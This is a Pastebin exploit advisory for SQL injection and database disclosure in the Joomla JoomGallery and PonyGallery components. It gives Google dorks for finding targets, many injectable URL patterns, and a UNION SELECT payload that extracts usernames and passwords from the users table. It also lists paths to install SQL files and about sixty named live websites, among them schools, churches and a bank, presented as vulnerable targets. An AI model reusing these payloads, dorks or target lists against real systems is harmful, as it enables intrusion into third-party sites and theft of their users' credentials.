API tools faq
paste
Advertisement
KingSkrupellos

Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Inj DB Disc

KingSkrupellos
Feb 11th, 2019
242
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.93 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 12/02/2019
  7. # Vendor Homepage : joomlander.net - joomlacode.org
  8. # Software Download Link : github.com/JoomGallery/JoomGallery/archive/master.zip
  9. adyawinsa.com/index.php/remository?func=fileinfo&id=2
  10. github.com/JoomGallery/JoomGallery
  11. # Software Information Link : en.joomgallery.net/faq/general-faq/migration-and-update-to-joomgallery-15.html
  12. en.joomgallery.net/demo/faq/general-faq/from-ponygallery-ml-in-joomla-1-5-89.html
  13. extensions.joomla.org/extension/photos-a-images/galleries/joomgallery/
  14. sourceforge.net/projects/pony-gallery/
  15. joomlacode.org/gf/project/ponygalleryrand/
  16. # Software Affected Versions : 3.3.0 3.2.2 for Joomla 3.x and previous versions.
  17. + PonyGallery 2.5.1 ML for Joomla 1.5 - PonyGallery v1.0.x extension
  18. # Tested On : Windows and Linux
  19. # Category : WebApps
  20. # Exploit Risk : Medium
  21. # Google Dorks : inurl:''/index.php?option=com_ponygallery''
  22. inurl:''/index.php?option=com_joomgallery''
  23. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  24. Special Elements used in an SQL Command ('SQL Injection') ]
  25. CWE-200 [ Information Exposure ]
  26. # Old Similar CVE [ Only Version and Parameters are different ] : CVE-2007-4046
  27. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  28. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  29. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  30.  
  31. ####################################################################
  32.  
  33. # Description about Software :
  34. ***************************
  35. JoomGallery is a gallery component completely integrated into Joomla!, with support for Joomla! 3.x
  36.  
  37. Pony Gallery - Module displays one or more random Pony - Gallery images, sizable thumbnails or
  38.  
  39. full-size, horizontal or vertical - orientation, with optional category and - author links.
  40.  
  41. This Joomla extension/component moved to JoomlaCode.org 12/12/2007 from Joomlander.Net.
  42.  
  43. Now JoomGallery and PonyGallery are presented together.
  44.  
  45. ####################################################################
  46.  
  47. # Impact :
  48. ***********
  49. * Joomla JoomGallery 3.2.2 PonyGallery 3.2.2 and other versions -
  50.  
  51. component for Joomla is prone to an SQL-injection vulnerability because it
  52.  
  53. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  54.  
  55. Exploiting this issue could allow an attacker to compromise the application,
  56.  
  57. access or modify data, or exploit latent vulnerabilities in the underlying database.
  58.  
  59. A remote attacker can send a specially crafted request to the vulnerable application
  60.  
  61. and execute arbitrary SQL commands in application`s database.
  62.  
  63. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  64.  
  65. An attacker can exploit this issue using a browser.
  66.  
  67. * This Software prone to an information exposure/database disclosure vulnerability.
  68.  
  69. Successful exploits of this issue may allow an attacker to obtain sensitive
  70.  
  71. information by downloading the full contents of the application's database.
  72.  
  73. * Any remote user may download the database files and gain access
  74.  
  75. to sensitive information including unencrypted authentication credentials.
  76.  
  77. ####################################################################
  78.  
  79. # SQL Injection Exploit :
  80. **********************
  81. /index.php?option=com_ponygallery&Itemid=[SQL Injection]
  82.  
  83. /index.php?option=com_ponygallery&Itemid=[SQL Injection]
  84.  
  85. /index.php?option=com_ponygallery&Itemid=[SQL Injection]&func=special
  86.  
  87. /index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Injection]
  88.  
  89. /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection]
  90.  
  91. /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection]&lang=dutch
  92.  
  93. /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection]
  94.  
  95. /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=special&sorting=lastcomment&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
  96.  
  97. /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en
  98.  
  99. /index.php?option=com_joomgallery&Itemid=[SQL Injection]
  100.  
  101. /index.php?view=detail&id=[SQL Injection]&option=com_joomgallery
  102.  
  103. /index.php?format=feed&type=rss&option=com_joomgallery&Itemid=[SQL Injection]
  104.  
  105. /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&Itemid=[SQL Injection]
  106.  
  107. /index.php?view=image&format=raw&type=orig&id=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
  108.  
  109. /index.php?view=image&format=raw&type=img&id=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
  110.  
  111. /index.php?view=detail&id=[ID-NUMBER]&option=com_joomgallery&lang=en&Itemid=[SQL Injection]
  112.  
  113. /index.php?view=category&catid=[ID-NUMBER]&option=com_joomgallery&Itemid=[ID-NUMBER]&page=[SQL Injection]
  114.  
  115. /index.php?option=com_joomgallery&func=download&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]&lang=ru
  116.  
  117. /index.php?option=com_joomgallery&catid=[ID-NUMBER]&lang=de&view=category&Itemid=[SQL Injection]&format=feed&type=atom
  118.  
  119. /index.php?view=category&catid=[ID-NUMBER]&page=[ID-NUMBER]&catpage=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
  120.  
  121. /index.php?view=category&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
  122.  
  123. /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en#subcategory
  124.  
  125. # Example SQL Injection Exploit Payload :
  126. *************************************
  127. %20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*
  128.  
  129. # Database Disclosure Exploit :
  130. ***************************
  131. /administrator/components/com_joomgallery/sql/install.mysql.utf8.sql
  132.  
  133. /administrator/components/com_joomgallery/sql/uninstall.mysql.utf8.sql
  134.  
  135. /administrator/components/com_joomgallery/sql/updates/mysql/2.0.0.sql
  136.  
  137. /administrator/components/com_joomgallery/sql/updates/mysql/2.1.0.sql
  138.  
  139. /administrator/components/com_joomgallery/sql/updates/mysql/3.0.0.sql
  140.  
  141. /administrator/components/com_joomgallery/sql/updates/mysql/3.1.0.sql
  142.  
  143. /administrator/components/com_joomgallery/sql/updates/mysql/3.2.0.sql
  144.  
  145. /administrator/components/com_joomgallery/sql/updates/mysql/3.2.1.sql
  146.  
  147. /administrator/components/com_joomgallery/sql/updates/mysql/3.3.0.sql
  148.  
  149. ####################################################################
  150.  
  151. # Example Vulnerable Sites :
  152. *************************
  153. [+] skhssco.org.mo/index.php?option=com_joomgallery&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en
  154.  
  155. [+] okokratt.ee/gamezone/index.php?option=com_joomgallery&func=viewcategory&catid=7&startpage=1&substartpage=1&Itemid=44%27&lang=en
  156.  
  157. [+] cimbria.net/joomla/index.php?option=com_ponygallery&Itemid=38%27
  158.  
  159. [+] kirchen-wiesbaden.de/kiwicms/index.php?option=com_ponygallery&Itemid=58&func=special&sorting=lastcomment&date=2018-11-01%27
  160.  
  161. [+] 2007-2013.przedszkole-szarytki.pl/index.php?option=com_ponygallery&Itemid=2&func=viewcategory&catid=294%27
  162.  
  163. [+] gimnazjum2013.gimnazjumrobakowo.ehost.pl/index.php?option=com_ponygallery&Itemid=40&func=detail&id=2842%27
  164.  
  165. [+] cobur.nl/vp/nl/index.php?option=com_ponygallery&Itemid=77&func=detail&id=1457%27
  166.  
  167. [+] fcppublicidade.com.br/fcppublicidadev02/index.php?option=com_ponygallery&func=detail&id=508%27
  168.  
  169. [+] ijzervlechtbedrijfserdalbv.nl/nl/index.php?option=com_ponygallery&Itemid=34&func=viewcategory&catid=12%27&lang=dutch
  170.  
  171. [+] przedszkole-elf.com/index.php?option=com_ponygallery&Itemid=11&func=detail&id=355%27
  172.  
  173. [+] ijzervlechtbedrijfserdalbv.nl/nl/index.php?option=com_ponygallery&Itemid=34&func=viewcategory&catid=13%27
  174.  
  175. [+] webo-airbrush.de/index.php?option=com_ponygallery&Itemid=26&func=viewcategory&catid=2%27
  176.  
  177. [+] jettspandoeken.nl/nl/index.php?option=com_ponygallery&Itemid=34%27
  178.  
  179. [+] spkowala.pl/index.php?option=com_ponygallery&Itemid=61%27&func=special
  180.  
  181. [+] vanessa-tholen.de/index.php?option=com_ponygallery&Itemid=30&func=viewcategory&catid=1%27
  182.  
  183. [+] dyadent.com.ec/index.php?option=com_ponygallery&Itemid=9&func=viewcategory&catid=7%27
  184.  
  185. [+] ebea.at/bernd/cms/index.php?option=com_ponygallery&Itemid=4%27
  186.  
  187. [+] planetacanino.com/index.php?option=com_ponygallery&Itemid=43%27
  188.  
  189. [+] melly-web.de/content/index.php?option=com_ponygallery&Itemid=1%27
  190.  
  191. [+] sanpedrolloc.awardspace.biz/index.php?option=com_ponygallery&Itemid=35%27
  192.  
  193. [+] dsi.cba.pl/index.php?option=com_ponygallery&Itemid=26&func=detail&id=6132%27
  194.  
  195. [+] hamazoor.ir/persian/index.php?option=com_ponygallery&Itemid=29&func=viewcategory&catid=123&startpage=1
  196.  
  197. [+] braeuwiese.at/index.php?option=com_joomgallery&func=viewcategory&catid=2&Itemid=27%27
  198.  
  199. [+] w-caspari.at/index.php/index.php?view=image&format=raw&type=orig&id=116&option=com_joomgallery&Itemid=69%27
  200.  
  201. [+] mitennis.com/old/index.php?format=feed&type=rss&option=com_joomgallery&Itemid=82%27
  202.  
  203. [+] tsg.myeasysolution.com/index.php?view=image&format=raw&type=orig&id=6&option=com_joomgallery&Itemid=52%27
  204.  
  205. [+] bianchicaterina.it/public/index.php?view=category&catid=7&option=com_joomgallery&Itemid=112%27
  206.  
  207. [+] parafiaotmuchow.pl/index.php?view=detail&id=227&option=com_joomgallery&Itemid=135%27
  208.  
  209. [+] elivaniacosta.com.br/new/index.php?option=com_joomgallery&view=gallery&Itemid=74%27
  210.  
  211. [+] templenoegaa.ie/index.php?view=category&catid=46&option=com_joomgallery&Itemid=53%27
  212.  
  213. [+] swalestudio.com/anime/index.php?option=com_joomgallery&func=detail&id=1808&Itemid=2%27
  214.  
  215. [+] bogorgreenforest.com/index.php?view=category&catid=4&option=com_joomgallery&Itemid=62%27
  216.  
  217. [+] capitalbank.co.zw/index.php?view=category&catid=1&startpage=3&substartpage=1&option=com_joomgallery&Itemid=144%27
  218.  
  219. [+] pinsk.pl/index.php?view=detail&id=52&option=com_joomgallery&Itemid=8%27
  220.  
  221. [+] pazyna.pl/index.php?view=detail&id=171%27&option=com_joomgallery
  222.  
  223. [+] arhiva.gcjelenac.com/index.php?option=com_joomgallery&Itemid=103&func=viewcategory&catid=4%27
  224.  
  225. [+] comunidadconocimiento.com/versionanterior/index.php?option=com_joomgallery&func=detail&id=124&Itemid=58%27
  226.  
  227. [+] gimnazjum51.poznan.pl/index.php?option=com_joomgallery&func=detail&id=11685&Itemid=8%27
  228.  
  229. [+] artegrazia.it/arte/index.php?option=com_joomgallery&func=detail&id=123&Itemid=57%27
  230.  
  231. [+] capitalbank.co.zw/index.php?view=image&format=raw&type=orig&id=15&option=com_joomgallery&Itemid=144%27
  232.  
  233. [+] stefvangorp.be/pages/index.php?view=image&format=raw&type=orig&id=16&option=com_joomgallery&Itemid=110%27
  234.  
  235. [+] qapsites.com.br/coophalis/index.php?view=category&catid=2&startpage=3&substartpage=1&option=com_joomgallery&Itemid=53%27
  236.  
  237. [+] sedeelectronica.yunqueradehenares.com/index.php?option=com_joomgallery&Itemid=72%27
  238.  
  239. [+] elivaniacosta.com.br/new/index.php?view=image&format=raw&type=img&id=166&option=com_joomgallery&Itemid=74%27
  240.  
  241. [+] jennersdorf.gernots.at/index.php?view=category&catid=84&page=13&catpage=1&option=com_joomgallery&Itemid=811%27
  242.  
  243. [+] petersmusikstudio.se/index.php?view=image&format=raw&type=orig&id=35&option=com_joomgallery&Itemid=57%27
  244.  
  245. [+] lacel.cnt.br/site_/administrator/index.php?option=com_joomgallery&act=1%27=categories
  246.  
  247. [+] zssvinov.cz/index.php?view=category&catid=69&option=com_joomgallery&Itemid=626%27
  248.  
  249. [+] vs.eggersdorf.at/index.php?view=category&catid=1&option=com_joomgallery&Itemid=31%27
  250.  
  251. [+] znkpomurje.com/old_joomla/index.php?view=category&catid=21&option=com_joomgallery&Itemid=63%27
  252.  
  253. [+] kalcherhof.com/index.php?option=com_joomgallery&catid=6&lang=de&view=category&Itemid=201%27&format=feed&type=atom
  254.  
  255. [+] apartmani-rakovic.com/index.php?view=category&catid=5&option=com_joomgallery&Itemid=69%27
  256.  
  257. [+] tr.institutbuhara.com/index.php?option=com_joomgallery&Itemid=75%27
  258.  
  259. [+] broprof.ru/burjated/index.php?option=com_joomgallery&func=download&catid=37&id=1601&Itemid=55%27&lang=ru
  260.  
  261. [+] omaspumpkinpatch.com/index.php?option=com_joomgallery&func=detail&id=27&Itemid=67%27
  262.  
  263. [+] rennrodeln-blankenburg.de/index.php?view=category&catid=5&option=com_joomgallery&Itemid=24%27
  264.  
  265. [+] musikschule-gnas.at/cms2/index.php?view=category&catid=52&option=com_joomgallery&Itemid=510%27
  266.  
  267. [+] hydrobiology-bg.com/index.php?view=detail&id=44&option=com_joomgallery&lang=en&Itemid=1%27
  268.  
  269. [+] uralvelo.ru/index.php?view=category&catid=14&option=com_joomgallery&Itemid=91%27
  270.  
  271. [+] rsc-gross-umstadt.de/index.php?view=category&catid=2&page=3&catpage=1&option=com_joomgallery&Itemid=61%27
  272.  
  273. [+] skastudents.com/index.php?view=detail&id=88&option=com_joomgallery&Itemid=84%27
  274.  
  275. [+] gartenfreunde-bondorf-gaeu.de/index.php?view=category&catid=2&option=com_joomgallery&Itemid=184&page=1%27
  276.  
  277. ####################################################################
  278.  
  279. # Example SQL Database Error :
  280. ****************************
  281. Deprecated: Assigning the return value of new by reference is
  282. deprecated in /home/users/puhelf/public_html/includes/joomla.php on line 829
  283.  
  284. Deprecated: Non-static method JSite::getMenu() should not be called statically,
  285. assuming $this from incompatible context in /home/doggymon/public_html
  286. /NJBalloon.com/components/com_joomgallery/views/detail/view.html.php on line 60
  287.  
  288. No valid database connection You have an error in your SQL syntax;
  289. check the manual that corresponds to your MySQL server version for the
  290. right syntax to use near '-8,8' at line 17 SQL=SELECT *, a.owner AS owner,
  291. ROUND(imgvotesum/imgvotes, 2) AS rating FROM jos_joomgallery AS
  292. a LEFT JOIN jos_joomgallery_catg AS c ON c.cid=a.catid WHERE
  293. a.published = '1' AND a.catid = '113' AND a.approved = '1' AND
  294. c.access <= '0' ORDER BY a.imgdate ASC, a.imgdate ASC,
  295. a.imgdate ASC LIMIT -8,8
  296.  
  297. ####################################################################
  298.  
  299. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  300.  
  301. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!